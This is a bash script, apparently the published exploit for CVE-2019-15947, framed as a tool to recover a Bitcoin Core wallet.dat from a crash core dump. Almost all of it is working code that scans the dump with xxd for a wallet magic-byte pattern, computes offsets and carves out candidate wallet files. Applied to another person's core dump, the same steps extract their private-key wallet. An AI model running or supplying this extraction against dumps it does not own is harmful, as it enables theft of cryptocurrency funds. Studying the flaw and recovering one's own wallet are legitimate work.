#!/bin/bash
#
# ./makeitrain.sh bitcoin-qt.crashdump.core
#   __ _  _  __   ___  __  ____ ____
#  /  ( \/ )/ _\ / __)/ _\/ ___(_  )
# (  O )  (/    ( (_ /    \___ \ )(
#  \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Donations:
# btc: 366pCbaSHGCqkuuXKxAPxc9BxPXGF3heTV
# CVE-2019-15947
# https://oxasploits.com/posts/exploit-archive-partial-disclosure/
#
# I likeeee... bigggg butts and I cannot lie...
# Tested on Bitcoin Core version v0.18.0 (64-bit)
#
# A utility to recover a bitcoin wallet.dat
# from coredumps. (memory dumps)
# PLEASE back up your wallet.dat first!
# No telling if importing one of these recovered
# wallets could cause futher data courruption!
#
# I claim no responsibity for the use of this code!
# 
# By oxagast / Marshall Whittaker
# marshall@oxagast.org
# Notes:
# This was tested on linux x86_64 crash dumps.
# When loading the recovered files, you may
# have to try to load it more than once.
# You'll probably get an error about missing
# address book information.
# Adjusting the CLEN variable (wallet size in
# characters) may help if the wallet is not
# recovered.
if [ "$#" -ne 1 ]; then
  echo "You must enter the core dump file as the only argument."
  exit 1;
fi
COREFN=$1;
CLEN=98304;

echo "Attempting to recover wallet.dat from $COREFN";
echo "Using wallet length: $CLEN characters... (adjusting CLEN may help if wallet is not recovered)";

COUNT=0;
if test -f "$COREFN"; then
  echo "Grepping for magic numbers...";
  xxd $COREFN | grep "6231 0500" > walletoffsets;
  if [ `cat walletoffsets | wc -l` -eq 0 ]; then
    echo "Cannot recover from this file.";
    echo "Sorry!";
    rm walletoffsets;
    exit 1;
  fi
  while read START; do
    let "COUNT++"
    POFF=$(echo $START | sed -e 's/.*b1//' | head -n $COUNT | tail -n 1 | wc -c)
    POFFH=$(printf "%x\n" $POFF);
    OFFSET=$(echo $START | sed -e 's/:.*//');
    OFFSET="0x$OFFSET";
    POFFH="0x$POFFH";
    echo "Offset: $OFFSET Difference: $POFFH";
    HEXSUBBED=$(printf "0x%X\n" $(($OFFSET - ( $POFFH - 0x03))));
    echo $HEXSUBBED;
    echo "Seeking to $HEXSUBBED...";
    xxd -p -l $CLEN --seek $HEXSUBBED $COREFN > test$COUNT.xxd
    echo "Writing new wallet: test$COUNT.dat...";
    xxd -p -r test$COUNT.xxd > test$COUNT.dat;
    xxd test$COUNT.dat | head -n 1;
  done < walletoffsets;
  echo "Removing temporary files";
  rm test*.xxd;
  rm walletoffsets;
  echo "Now try to load each of the test dat files."
  echo "Sometimes they need to be loaded twice.";
  echo "Ignore any errors about addressbook being courrupted.";
  exit 0;
else
  echo "File doesn't exist...";
fi;